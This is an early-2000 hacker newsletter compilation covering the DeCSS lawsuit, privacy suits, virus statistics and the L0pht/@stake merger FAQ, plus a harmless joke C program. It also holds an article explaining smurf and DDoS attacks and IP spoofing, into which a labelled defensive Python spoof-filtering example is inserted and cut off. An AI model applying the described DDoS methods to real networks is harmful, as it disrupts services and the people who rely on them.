"It sounds like the plaintiffs goofed," said Judy Jennison, head of Perkins Coie's Silicon Valley intellectual property litigation practice and an experienced trade secrets trial attorney who is not involved in the case. "If they didn't file it under seal, they could be seen to have given up their (trade secret) rights."

Attorney Allonn Levy, who is representing defendant Andrew Bunner in the case, agreed. Even if the document was inadvertently made public, he said, it could jeopardize the trade secret status of the material.

"Anyone could have copied out the trade secrets from the file before it was sealed," he said, although he added that he did not know whether anyone had done so. "That raises a serious question of whether that material is protectable."

According to defendants in the case, DeCSS was created by legal reverse engineering techniques to allow DVDs to be played on the Linux platform. Since its release, however, the film industry has vilified the program as an illegal hack aimed at producing illegal copies of DVD movies.

In addition to the Copy Control Association's suit in California, member companies of the Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals for alleged violations of the Digital Millennium Copyright Act. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code throughout the trials' durations.

The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss "the technical insecurity of DVD" and to demonstrate their points through reverse engineering.

The DVD association was formed in December of last year by member companies of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System.

News.com's Courtney Macavinta contributed to this report.

-=-

Wired;

DVD Lawyers Make Secret Public
by Declan McCullagh
3:05 p.m. 26.Jan.2000 PST

Lawyers representing the DVD industry got caught in an embarrassing gaffe when they filed a lawsuit and accidentally publicized the computer code they wanted to keep secret.

The DVD Copy Control Association included its "trade secret" source code in court documents, but forgot to ask the judge to seal them from public scrutiny. Whoops.

In a hastily arranged hearing Wednesday morning, DVD CCA lawyers asked Santa Clara Superior Court Judge William J. Elfving to correct their oversight, and he agreed to keep the document confidential.

It may be a little late. The document is dated 13 January and is widely available on the Web. The owner of one site that placed the 140KB declaration online says over 21,000 people have downloaded it so far.

The 11KB "CSSscramble" source code, part of the larger declaration of DVD CCA president John Hoy, cannot be readily compiled into a DVD viewer or copier. But if it had not been released online last October, the DVD encryption scheme likely would not have been penetrated.

Elfving granted an injunction last Friday, ordering 21 defendants to stop posting DeCSS software -- which allows compressed video images to be copied from a DVD disc onto a hard drive -- on their Web sites.

The blunder won't help the DVD CCA attorneys in their as-yet quixotic quest to rid the Net of DeCSS. The entertainment industry frets that such programs could eventually allow widespread piracy of movies.

One California litigator who specializes in Internet and intellectual property cases says the boner won't derail the DVDCCA's lawsuit filed last month in state court.

"The fact that these lawyers inadvertently filed with the court the source code and that made it a public document does not have a [substantial impact]," says Megan E. Gray, a lawyer in the Los Angeles office of Baker and Hostetler.

Gray said the biggest effect might be to mute the rhetoric of DVD CCA lawyers. "It's difficult to say it's an outrage ... when you yourself have contributed to public disclosure. It undermines your credibility," Gray said.

Making an already difficult task even more tricky for DVD CCA lawyers is that both the four-page CSSscramble source code and the DeCSS utility have been mirrored by dozens -- perhaps hundreds -- of Internet users in a kind of global keep-away game.

Activists outside a hearing even distributed copies of CSSscramble to people outside the courthouse, prompting a DVD CCA attorney to enter the document into official court records. Jeffrey Kessler, the plaintiff's lead attorney from Weil, Gotshal and Manges, told the judge at the time that CSSscramble was a trade secret and should be confidential.

"I don't want to endanger their trade secret status by putting them in the public record," Kessler said, according to a transcript. He did not immediately return phone calls.

One of his colleagues separately asked that a defense exhibit with CSSscramble be placed under seal. "DVD CCA requests the court place the [declaration] under seal to avoid placing this information in the public record," Jared Bobrow wrote in a six-page brief on 9 January.

But both forgot about the DVD CCA president's exhibit -- that included CSSscramble -- until this week.

"We still haven't waived our arguments that it has been entered into public domain and trade secret protection has been waived by the other side. We're going to pursue that," said Robin Gross, staff attorney for the Electronic Frontier Foundation, which is representing some of the defendants.

"It threatens their case against the [DeCSS] utility. Their argument is that this information is highly protected trade secrets and they go through all the extremes to make sure the protection is in place," Gross said. "Our position is that they've waived trade secret protection from entering this into the public domain."

Gross said EFF had not decided whether to appeal the preliminary injunction or ask for a trial.

@HWA

64.0 HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Universal Image, a Dallas based educational video provider, filed a $4 billion lawsuit against Yahoo and its Yahoo Broadcast unit last December. The suit alleges that Yahoo violated state law through the use of cookies that can be used to track surfers around the web and may violate the Texas anti-stalking law.

C|Net
http://news.cnet.com/news/0-1005-200-1533164.html?tag=st.ne.1002.bgif.1005-200-1533164

Texas company accuses Yahoo of privacy violations
By Bloomberg News
Special to CNET News.com
January 26, 2000, 4:45 p.m. PT

DALLAS--Yahoo has been accused by closely held Universal Image of violating Texas' anti-stalking law by allegedly tracking computer users' every movement on the Internet without their consent.

Universal Image, which does business as Chalkboardtalk.com on the Web, made the claim as part of a $4 billion lawsuit against Yahoo and its Yahoo Broadcast unit. Dallas-based Universal Image, an educational video provider, filed the suit in December.

Universal Image has asked a Dallas judge to declare that Yahoo violated state law through the use of "cookies"--files attached to the computer of an Internet user that collect such information as names and addresses, Universal Image's attorneys said.

The lawsuit "concerns the right of privacy of every Internet user in America," said Larry Friedman, an attorney for Universal Image.

A Yahoo representative declined comment.

Copyright 2000, Bloomberg L.P. All Rights Reserved.

@HWA

65.0 HNN: Jan 27: Data From Probes of Takedown.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William

The web site for John Markoff's book Takedown is an obvious target for online vandals. A histogram of attack attempts to www.takedown.com has been released that correlates intrusion attempts and real-world events.

National Partnership for Advanced Computation Infrastructure
http://security.sdsc.edu/incidents/

Takedown.com
http://www.takedown.com/

FREE KEVIN
http://www.freekevin.com/

66.0 HNN: Jan 27: Top Ten Viruses of 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB

Anti-virus software firm Sophos has released its list of the top ten viruses of 1999. Form, a virus almost ten years old, makes it to number 9 on the list, and six of the ten are Word macro viruses. (Does anyone really use macros for anything other than viruses?)
Sophos.com
http://www.sophos.com/pressoffice/pressrel/uk/20000125virusreport.html

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_619000/619687.stm

Sophos:
(Article unavailable, host was not responding - Ed)

BBC;

By BBC News Online's Damian Carrington

An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common.

One boot sector virus, Form, is nearly a decade old but still appears in the top ten.

The table was compiled by anti-virus software firm Sophos, based on thousands of calls for help to the company.

The three self-propagating viruses were Melissa, ExploreZip and Ska-Happy99 which forward themselves by hijacking a computer's email program. This means that instead of taking months to spread into the wild, these viruses have the potential to attack globally within days.

However, Graham Cluley, senior technology consultant for Sophos, believes that old viruses still pose a major threat: "Some viruses become so common, they will never become extinct - they will always lurk on a floppy disk in someone's drawer.

"Also, people may be aware of the latest scare but not the background threat. It's difficult to get people excited about old threats."

Spreading out

The most reported virus in 1999 was a macro virus called Laroux and was first detected in early 1996. Unusually for a widespread macro virus, Laroux infects Excel spreadsheets rather than a Word document.

"It may be that people are getting quite cautious about opening documents, as they may have been hit by that before, but are not so used to the threat of spreadsheets," says Mr Cluley.

According to Mr Cluley, the key to long-lived viruses is being virtually invisible. "Viruses which jump up and down with very destructive payloads draw attention to themselves and effectively kill themselves off, like lemmings.

"Form does nothing, it just spreads, although it still causes damage by using up system resources."

Silent but deadly

Whilst having your hard disk wiped by a virus may seem the computer equivalent of Armageddon, many companies and individuals keep back-up copies of information. Some of the most damaging viruses are not destructive at all, says Mr Cluley.

"Some, like Melissa, can forward documents to e-mail addresses stored on your computer - highly confidential information has leaked from companies in this way," he says.

And "data diddler" viruses exist which make subtle changes to data in a spreadsheet. "If those are your company results, it could be very embarrassing," he adds.

The year 2000 will see hoax viruses - email warnings of non-existent viruses - continue to cause enormous problems believes Mr Cluley.

"In a way they are far more damaging than real viruses as they set off e-mail hurricanes and you can't disinfect a hoax.

"We had far more people seeking information on a hoax about a game involving Santa and his elves than any real virus."

Finally, Mr Cluley and other anti-virus experts are awaiting the sentencing in February of David L Smith, who pleaded guilty to distributing the Melissa macro virus and admitted causing more than $80m damage to North American companies.

"We are rather hoping that, depending on what the sentence is, it may send out a message to virus authors that this isn't cool and the authorities are prepared to pursue you."

@HWA

67.0 HNN: Jan 27: French Eavesdrop on British GSM Phones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Cryptome

FRENCH intelligence has invested millions in satellite technology so that it can intercept British businessmen's wireless GSM telephone calls. The French government upgraded signals intelligence last year. Now secret service agencies are using the technology to listen in to commercial secrets.
At least eight centers, scattered across France, are being "aimed" at British defense firms, petroleum companies and other commercial targets.

Sunday Times
http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws03006.html?999
( 404 - they've moved it or eaten it or something, couldn't find it - Ed)

@HWA

68.0 So wtf is the deal with l0pht and @stake? here's the FAQ jack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For those of you that need things spelled out for you ($$$) here's what happened with l0pht and @stake ($$$) - Ed

L0pht/@Stake Merger FAQ

1. Is it true? Did L0pht Heavy Industries actually merge with @Stake?
2. Why did you do it? You seemed to have a perfect club-house environment.
3. So, how's the cultural fit with @Stake? How do the L0pht's values fit in there?
4. So what's going to happen to the old L0pht space you were in?
5. And what about the webpage? Is it going to go away? Is it going to be put on 'atstake.com'?
6. What exactly is L0pht doing over at @Stake? Are you consulting now?
7. What's going to happen to all the advisories? Are you still going to publish them?
8. Are you still going to sell L0phtCrack? And AntiSniff? Will there be new versions?
9. What's the deal with Hacker News Network anyway? Is that actually part of L0pht, and was it picked up by the merger?
10. How does it feel working with a bunch of business stiffs?
11. What are the financial makings of this merger?
12. You talk about 'Strategic Security Solutions' on the @Stake webpage, and you talk about being truly 'vendor-neutral'... isn't that what everyone else is doing? What makes @Stake different? Explain in small words. (Yeah we're all dumb fuckers out here, - Ed)
13. I don't trust hackers like you. Why should I?
14. Are you still going to get drunk and rant at cons? What about your 'professional image'?
15. Are you hiring? Can I be a L0pht Member?
16. Does @Stake have an open-door policy?
17. Are you still going to the MIT Swapfest and selling funky stuff?
18. Are you still using your handles? Or are you going to use your real names now?
19. What's up with Guerilla Net? Are you guys still doing hardware projects over at @Stake?
20. Will you be coming out with any more T-shirts?


1. Is it true? Did L0pht Heavy Industries actually merge with @Stake?

YES. L0pht Heavy Industries was incorporated, had employees on the payroll, and sold software products and consulting services. In short, we were a real company and had been operating that way for a couple years. L0pht Heavy Industries legally merged with @Stake in the beginning of 2000 so we are all one company now. The new company will go by the name of @Stake.


2. Why did you do it? You seemed to have a perfect club-house environment.

We strived to be (and achieved) a pure R&D environment. Unfortunately pure research and development is not a very profitable arena. In addition, one needs business people, sales and productization of services. So, while we tried to keep the research and fun environment we were fighting a losing battle in making ends meet. To summarize, we had problems scaling. Everyone was spending more money and effort doing less research and experiments. The L0pht wanted desperately to avoid having to compromise our goals and ideals which would have happened if we had continued to go the route we were.

The solution was obvious. We needed to find an organization that valued the R&D work that we did, could benefit from it, profit from it, and enable us to keep contributing to the community. We feel very fortunate in having come across such people in @Stake. We see this as a win-win situation where we will be able to do a lot of the research that we were unable to do while just being the L0pht. We also feel very fortunate in finding an organization that did not expect us to about-face in the way we approach sharing our findings with people.


3. So, how's the cultural fit with @Stake? How do the L0pht's values fit in there?

Here is a PARTIAL list of components that we find work very well with our VALUES and make us very comfortable about the merger:

@Stake is aiming to be completely product / vendor neutral. This enables them to make the best design decision and recommendations possible to the customer without unknown biases. This is accomplished in the following ways:

    @Stake will not take commissions / kick-backs from product vendors for recommending a product into a customer.

    @Stake is in the business of providing strategic services rather than tactical ones. What this means is that they see the benefit in helping design / implement solutions with security and functionality from the beginning rather than looking for known problems and helping to only remediate them when they could have been avoided all together.

    @Stake will not sell products. Thus they do not have customers being worried that they will recommend their own product even if it might not be the best solution. What this means to us is that we get to continue coming out with tools and programs but are forced to give them away for free! How cool is that!

We are completely non-biased in our opinions of products and technologies, and we are able to continue our experimentation and reverse-engineering of such. This also allows us to continue our "consumer reports"-style announcements, papers and research.

@Stake is committed to a strong research and development leg as a method of always being a leader and not just a follower.

@Stake wants smarter customers rather than dumber ones in the community. By helping to educate everyone as much as possible it not only helps differentiate the company but allows more interesting and thorough solutions to be deployed for customers. This is the same belief that the L0pht has always held.


4. So what's going to happen to the old L0pht space you were in?

We still have the space. Some of the hardware projects that were going on over there are just not practical to move. We are also setting up new lab space that has many of the things that we could not manage at the old location.


5. And what about the webpage? Is it going to go away? Is it going to be put on 'atstake.com'?

Not in the immediate future. There will obviously be a period of time before we manage to fully integrate everything. As was stated in a previous response one of the reasons we embarked upon this merger is due to the like-minded beliefs. So, when the two web sites finally merge you can expect to find the same sort of information that is currently published in an even better format. It might even be that they stay as individual web sites, one focusing more on R&D and the other on business angles. What it boils down to is that you can expect some changes but the main focus will be quite similar to what it currently is.


6. What exactly is L0pht doing over at @Stake? Are you consulting now?

The L0pht forms the nucleus of the Research and Development group in @Stake. By continuing to push the envelope in security research we can help productize new services to the consulting and business legs of @Stake.


7. What's going to happen to all the advisories? Are you still going to publish them?

The L0pht will continue to publish advisories. This will not change. The L0pht never did and never will publish an advisory based upon insider information that would betray someone's trust. However, we will continue to act as a Consumer Reports style organization in posting our general findings through analysis and evaluation as general customers reviewing software. We still believe in Full-Disclosure in our advisories. We are also happy that we will be better able to work with companies in giving them advance notice before posting publicly to the world.


8. Are you still going to sell L0phtCrack? And AntiSniff? Will there be new versions?

Since @Stake is purely a consulting services company, it did not acquire the products that were sold commercially from the L0pht. L0phtCrack and AntiSniff are being moved to a holding company independent of @Stake and will continue to be sold. We will be donating the proceeds (after operational expenses) to non-profit and educational organizations. The free versions will continue to be free and include source code.

A new version of L0phtCrack was 95% complete at the time of the merger. The authors will probably finish the last bit and release L0phtCrack 3.0 but the schedule is uncertain. A Linux version of the researchers version of AntiSniff is underway and will be released under the same free researchers license that the command line AntiSniff currently has.


9. What's the deal with Hacker News Network anyway? Is that actually part of L0pht, and was it picked up by the merger?

Hacker News Network was run by l0pht employees on l0pht equipment so it certainly was a part of l0pht. We feel it provides a valuable news source to the security community so it will continue to operate as part of @Stake. We expect to be able to spend more time and resources in making it an even better resource for the community.


10. How does it feel working with a bunch of business stiffs?

@Stake is definitely not populated with a bunch of business stiffs. One of the reasons L0pht merged with @Stake was the quality of the people there. They understand our vision of computer security. Some of them would even be considered hackers exactly the same way we think of ourselves as hackers. Things are a bit more businesslike at the merged company but the place is a place that values openness, diversity, creativity, thinking outside of the box, and coming up with non-conventional solutions.


11. What are the financial makings of this merger?

@Stake is not a publicly traded company right now and as such we are not able to give those details. We are happy to say that the main impetus for the merger was the ability to engage in much more grandiose research work and not compromise our morals in the process. We started into this field in order to learn, educate, and contribute and are happy to say that we should only be able to do these things even better now.


12. You talk about 'Strategic Security Solutions' on the @Stake webpage, and you talk about being truly 'vendor-neutral'... isn't that what everyone else is doing? What makes @Stake different? Explain in small words.

The answer to question #3 should help on the vendor-neutral aspect being more than just lip service. As for the 'Strategic Security Solutions' this is similar to how the L0pht always handled customers. An example in the software world between tactical and strategic might help:

    Problem: A buffer overflow was found in a section of code. The offending call was the unbounded strcpy().

    Tactical approach: Replace that particular strcpy() call with the bounded strncpy(). If a similar problem is found elsewhere later on fix that one after it is reported. Repeat as necessary.

    Strategic approach: From the design point help model with security involved. Use bounded string functions to remove that class of future problems.

Obviously the above is just an example of the way we see tactical being different from strategic approaches. This is how we view all projects be they in the infrastructure, content, operational, network, etc. fields. It also does not preclude us from implementing tactical solutions as necessary but the main focus is enabling, not only reacting.


13. I don't trust hackers like you. Why should I?

We call ourselves hackers using the original, positive meaning of the word. A good definition can be found in Eric Raymond's Hacker's Dictionary. We think hackers have higher ethical standards than most in the business world. We do not do anything illegal with our computers or anyone else's. We get our kicks finding and solving security vulnerabilities in products and technologies using our own networks, hardware, and other resources. This is the way we have always operated and that is the way we will continue to operate. If you can't relate to this, then you should probably reinvestigate the meaning of the word 'hacker'.


14. Are you still going to get drunk and rant at cons? What about your 'professional image'?

We will continue to be involved in conferences the way we always have. Don't you think that if @Stake had told Mudge he would not be able to have a beer with his friends and talk about crypto-systems that would have been a show stopper for the merger right there?


15. Are you hiring? Can I be a L0pht Member?

We are definitely hiring. We cannot thrive and be the leader in security without the best people on the planet. Submit your resume to jobs@atstake.com if you are interested. We want to work with the best and you probably do, too. If you have top notch security skills in consulting or research we urge you to apply. That being said, we cannot accept everyone that applies but will do our best to make sure everyone gets a fair shake.

The L0pht is fully integrated with @Stake so there is no separate group of people called "L0pht Members". We are proud to call ourselves members of the @Stake team. We will now be known as 'The Hackers Formerly Known As The L0pht', or perhaps some unpronounceable symbol.


16. Does @Stake have an open-door policy?

@Stake operates in a similar fashion to most other professional service organizations. The reason we went to the closed door policy at the L0pht was to enable ourselves to get work done and not just have the place be a local hang-out for people wanting to kick back with a beer and watch TV. While we will be more accessible at @Stake, we are there to do R&D work and as such it will continue to not be an open-door-hangout type environment.

Keep in mind, however, that L0pht has not had a true open-door policy for many years. At our original location, the L0pht was more of a club-house and place for general hanging-out of hackers from around the world. When we moved to our new location and decided to do real research and provide to the community, the L0pht was not open for everybody. We occasionally gave tours and threw parties, but the space was not open for visitors 24 hours a day.


17. Are you still going to the MIT Swapfest and selling funky stuff?

We will still be going to the MIT Swapfest to see people and pick up various things. We hope we won't have to sell our scraps at it anymore in order to make ends meet :) However, as most people going to the MIT flea, we will also want to "upgrade our junk pile". We will be selling, just not every month as in the past.


18. Are you still using your handles? Or are you going to use your real names now?

We have been using our handles for over 10 years now. It is what we have published under in academic journals, magazines, books, given training courses under, and provided recommendations to the US Senate under. As such they are as much our recognized names in the security community and we will continue to use them.

Many companies seem to be scared of doing business with people using pseudonyms or handles. This is a problem that we would like to solve. We are not really hiding from anyone, but this is how we've been known for a long time, and for some, is what our parents call us. We hope to educate those companies by showing them that it's not the name that's important, rather the information and services that can be provided.


19. What's up with Guerilla Net? Are you guys still doing hardware projects over at @Stake?

@Stake has committed to enabling the R&D labs to work on hardware related projects as well as protocol and software ones. We see an ultimate marriage between all of these areas as technology is progressing and would be remiss if we turned a blind eye towards any of them.


20. Will you be coming out with any more T-shirts?

The T-shirts were fun little projects that we did more out of amusement than anything else. Should the opportunity and inspiration strike again we would not rule out the possibility of coming out with some new designs.

@HWA

69.0 Anti-Offline releases majorly ereet 0-day script kiddie juarez!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Feb 12th (or in around there, something like that, check the site and YEH it is a joke, just in case any AOL admins are looking at the code *g* - Ed )

<snip>

/*******************************************
 * ANTIOFFLINE INTRODUCES SCNEWH0RE v6.9   *
 * coded by sil@antioffline                *
 * Don't try this at home script kiddies   *
 * Elite shouts to Kevin Mitnick who we    *
 * hope someday goes back to jail so we    *
 * could have a reason 2 0nw0r1z3 websites *
 * again. Tested on RedCrap AOL Linux 6.1  *
 * gcc filename.c -o f00name -lpthread     *
 * && ./f00name                            *
 *******************************************/

#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>

/* each thread writes its one-character argument to stdout 10000 times */
void * process(void * arg)
{
    int i;
    /* INSERT uberleet cursing... makes luzers fear us */
    fprintf(stderr, "Starting pimpage biAtch %s\n", (char *) arg);
    for (i = 0; i < 10000; i++) {
        write(1, (char *) arg, 1);
    }
    return NULL;
}

int main(void)
{
    int retcode, i;
    pthread_t th[10];        /* one handle per thread so every one can be joined */
    int started[10] = {0};   /* only join the threads that were actually created */
    /* one thread per letter; the ten letters spell the "payload" */
    const char *letters[10] = {"s", "c", "e", "n", "e", "w", "h", "0", "r", "e"};
    /* the per-thread error messages, in the original order */
    const char *whine[10] = {
        "create s failed asshole %d\n",
        "create c failed too moron %d\n",
        "create e is fucked up too %d\n",
        "create n is also fucked up %d\n",
        "your a dipshit jackass %d\n",
        "learn to compile scriptkiddie %d\n",
        "AntiOffline 0wns your ass %d\n",
        "Hope you don't make a living off this %d\n",
        "your almost finished fucking things up %d\n",
        "stick to hax0ring hotmail fuckwad %d\n"
    };

    // insert a shitload of comments
    // these don't make sense but when people
    // see them, they will know we are ejeet
    // they will fear our 45535!@#$*

    /* insert more shit to make this bitch longer */
    /* gn0 your role */
    for (i = 0; i < 10; i++) {
        retcode = pthread_create(&th[i], NULL, process, (void *) letters[i]);
        if (retcode != 0)
            fprintf(stderr, whine[i], retcode);
        else
            started[i] = 1;
    }

    /* wait for every thread; without this main() returns and the process
       exits before most of the 100000 characters have been written */
    for (i = 0; i < 10; i++)
        if (started[i])
            pthread_join(th[i], NULL);

    return 0;
}

<snip>

@HWA

70.0 HNN: Jan 31: MS Issues Security Patch for Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The newest version of the windows operating system, technically still in beta and not scheduled for release until February 17, 2000, has a major security hole. Microsoft has been quick to issue a patch for the hole that allows web surfers to view files stored on a targeted web server. The problem lies with Microsoft Index Server which is built into Windows 2000. At least six banks and three major computer manufacturers have been effected by the bug. (What the hell are they doing using beta software on production systems anyway?) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop MSNBC http://www.msnbc.com/news/363355.asp @HWA 71.0 "Have script Will destroy" - a buffer overflow article ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ This article uses purty graphical pikturez so you may want to check the original site. Have Script, Will Destroy (Lessons in DoS) By: Brian Martin I began writing this article almost one year ago, after the onslaught of smurf attacks being launched against various networks throughout the Internet. At the time, the newly discovered Denial of Service (DoS) attack was a crippling tool designed for one purpose; remotely disabling machines by flooding them with more traffic than they could handle. The smurf attack was the first well known (and well abused) DoS attack that could effectively cripple any network, regardless of size or bandwidth. This presented a new problem to network administrators and security personnel worldwide. The LowDown Also known as Network Saturation Attacks or Bandwidth Consumption Attacks, the new breed of DoS attacks flood a remote network with an staggering amount of traffic. Routers and servers targeted would go into overdrive attempting to route or handle each packet as it came in. 
As the network receives more and more of these illegitimate packets, it quickly begins to cause legitimate traffic like web and mail to be denied. In minutes, all network activity is shut down as the attack consumes all available network resources. Prior to bandwidth consumption attacks, most DoS attacks involved sending very few malformed packets to a remote server that would cause it to crash. This occured because of bugs in the way many servers handled the malformed packets. Malformed packets (also known as Magic Packets) consisted of network protocol options that were out of sequence, improperly matched, or too large. As a result, a server receiving these packets had no rules or guidelines dictating how it should behave when processing the malformed packet. The result was a system panic or crash that would basically shut the machine down or force it to reboot. Perhaps the most well known example of this type of attack is the WinNuke attack. Regardless of ethics or motives, Magic Packet DoS attacks showed an inkling of grace in their execution. A single packet sent from one server to another, causing it to crash or reboot was a targeted attack. The precision with which this type of attack is carried out is analogous to a scalpel in surgery. Network consumption attacks on the other hand involve millions of packets. Worse, once launched the attack was no respector of those standing between the launch point and the target network. Often times thousands of customers sharing bandwidth with the target would be adversely affected as well. A single attack of this nature had the ability to knock thousands of machines off the Internet in a single swoop. Such attacks are the equivalent of using a broadsword to do surgery. The Next Generation Attacks like the smurf DoS have a cascading affect that can be seen as a virtual avalanche. The starting point is nothing more than a few pebbles and snowballs (packets). 
As they travel downhill (along the path of routers to the target), they accumulate more mass and trigger the release of more pebbles. By the time the falling material hits the bottom of the mountain (the target), it is swamped in large amounts of snow and rocks. Despite the effectiveness of this attack, there is a single point from which the attack is launched. If an attack is detected early enough, it is possible to filter out the offending packets before they leave the original network. The next generation of Denial of Service attacks are known as Distributed Denial of Service (DDoS) attacks. Expanding on the idea of network saturation attacks, DDoS effectively does the same thing but utilizes several launch points. The philosophy and objective of this is twofold. First, if a single machine being used to launch an attack is discovered and disabled, the overall attack proceeds with near full force. Second, by utilizing several launch points on different networks, an attacker is able to shut down larger networks that might not otherwise be affected by a single flood. Taking Down the Big Boys Prior to launching this form of DDoS flood, the attacker must first compromise various hosts on different networks. The more networks and machines used as launch points, the more potent the attack. Once each host had been broken into, they would install a DDoS client program on the machine that would sit ready to attack. Once the network of compromised servers was configured with the new client program, the attacker could send a quick command from the DDoS server software triggering each machine to launch an attack. [chart comparing 56k vs cable vs t1 vs t3] Until this last wave of DDoS attacks, it was generally assumed that hosts residing on large pipes (connections with incredible bandwidth) could not be seriously affected by network saturation attacks. As large Internet Service Providers (ISPs) are finding out, this is no longer the case. 
By using several smaller network connections, an attacker can eventually saturate the biggest ISPs and consume all of their bandwidth. This was demonstrated most effectively with the eBay, Amazon, Buy.com and other large scale web sites. Difficulty in Tracking Neophytes to networking always seem to question why these attacks are not tracked down, and the legs of the perpetrator not broken. It is a rare case to see ISPs interested in tracking down the individual(s) behind these attacks. Rather than take the time and effort to perform an investigation (which is lenghty), most ISPs realize that a quick filter denying ALL traffic to the site being attacked is a better solution. In essence, the ISP does the job of the person launching the attack and does it much more effeciently. As you can imagine, that is not exactly a deterrent for those committing these attacks. One of the primary reasons investigations of DoS attacks is lengthy is it involves tracking down the packets hitting the target. Rather than leave the launch point with the IP address of the machine actually being used, the packets are tagged with forged source IP addresses. Since the IP information in each packet varies wildly, and since the addresses can not be trusted, a network administrator must trace the packets back to the source one router at a time. This involves connecting to the router (often times this must be done at the physical console for security reasons), setting up a filter or sniffer to detect where the packets are coming from before arriving at that particular router, and then move to the new offending router. This presents problems when you consider a single packet may cross as many as thirty routers owned by ten different companies. The act of forging the source IP of a packet is called IP Spoofing and is the basis for a wide variety of network attacks. 
One of the original intentions of a Denial of Service attack was to knock a machine off the network in order for you to assume its identity. Once you masquerade as that machine, it is possible to intercept traffic intended for it as well as gain access to other machines on the target network via trusted host relationships. Attackers today seem to have lost all focus on the reason one would commit a DoS attack.

Save The Day Already!

Denial of Service attacks are not new. They have existed in one form or another since computers were invented. In the past they involved consuming resources like disk drive space, memory or CPU cycles. Those not familiar with how computers operate often scream for quick solutions to the various DoS attacks that plague our networks. Unfortunately, this is easier said than done.

Every weekday morning and afternoon millions of Americans go to and from work. They pile on to two and four lane freeways only to move at a crawl. Travelling ten miles in one hour is a common occurrence for those fighting rush hour traffic in heavily trafficked areas of business districts in cities across the nation. Every day they carry out this ritual, screaming and cursing the thousands of other drivers clogging the roads, and day after day the problem does not fix itself. Be it packets or cars, it is very well established that enough of either will overcrowd a road or network connection. At a given point, too many of either will bring all traffic to a standstill.

Why isn't the traffic problem solved? We all know the solution is bigger and better roads, more carpooling, diverse schedules, and more common sense when behind the wheel. Fat chance that will happen anytime soon. On the flip side, it is very unlikely that they will fix every router on every network and install mechanisms to help avoid network saturation attacks. In the long run, it is a rather simple fix that could help eliminate these attacks.
Any network device that accepts or passes network traffic can be designed to monitor activity better. If a web server is receiving too many hits, it starts rejecting new connections so that existing connections can still view pages or interact with the site. This practice is called throttling or bandwidth limiting and is designed to prevent excessive connections, conserve resources and keep things operating correctly. Unfortunately, this philosophy has not carried over to routers (the machines that pass all Internet traffic), so network consumption attacks go on unchecked.

Relatively few networks have learned that this is a good solution to flood attacks. As such, their routers are designed to monitor traffic and quit passing illegitimate traffic once it is detected. The problem with this approach is that once the flood of packets has hit the remote network, the damage is done. The downside to this mechanism is the added latency as the router checks each and every packet that passes through it. Because of this slowdown, ISPs hesitate to implement this solution.

In order to make connection throttling effective, every network router should have this mechanism implemented. This would allow a router close to the source of the attack to detect the illicit traffic and put up a filter that rejects it before it leaves the launch point. This invariably leads to the question "How do you know if traffic is illegitimate?" Looking back to the section on IP spoofing, we can easily create a quick solution to the problem. In fact, this mechanism is found in most firewalls implemented today. In the diagram above, we show a forged packet with the IP address of 150.23.83.44. It stands to reason that such a packet would not legitimately be travelling around a network designated by the 1.2.3.x subnet. Because of this, any router on that network (especially the one acting as a gateway to the outside world) receiving that packet should drop it.
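The gateway check just described, together with the traffic-average heuristic the article goes on to propose (a surge to one destination in which every packet claims a different source), written out as an added Python example. This is not code from the article or from any router vendor: the 1.2.3.0/24 prefix and the forged 150.23.83.44 address are the article's, while the packet records, the thresholds and the sample traffic are constructed for the illustration.

```python
"""Added example: two router-side checks against spoofed saturation floods.

1. Ingress/egress filtering: the gateway for 1.2.3.0/24 refuses to forward an
   outbound packet whose source is outside its own prefix, and refuses an
   inbound packet that claims a source inside it.
2. Spoofed-flood heuristic: per destination, a rate well above the baseline
   where nearly every packet carries a different source address.

Addresses, thresholds and traffic below are constructed for illustration.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    src: str    # claimed source address (may be forged)
    dst: str
    ts: float   # arrival time in seconds


# The article's example network behind the gateway.
LOCAL_NET = ip_network("1.2.3.0/24")


def egress_verdict(pkt: Packet, local=LOCAL_NET) -> str:
    """Packet leaving the local network: a source outside our prefix is forged."""
    return "forward" if ip_address(pkt.src) in local else "drop:spoofed-source"


def ingress_verdict(pkt: Packet, local=LOCAL_NET) -> str:
    """Packet arriving from outside: a source claiming our prefix is forged."""
    return "drop:spoofed-source" if ip_address(pkt.src) in local else "forward"


class SpoofFloodDetector:
    """Sliding window per destination. Flags a surge (rate above
    baseline * surge_factor) in which the share of distinct sources is high."""

    def __init__(self, window=1.0, baseline_pps=50.0, surge_factor=4.0,
                 distinct_ratio=0.9):
        self.window = window
        self.threshold = baseline_pps * surge_factor * window  # packets/window
        self.distinct_ratio = distinct_ratio
        self._recent = defaultdict(deque)  # dst -> deque of (ts, src)

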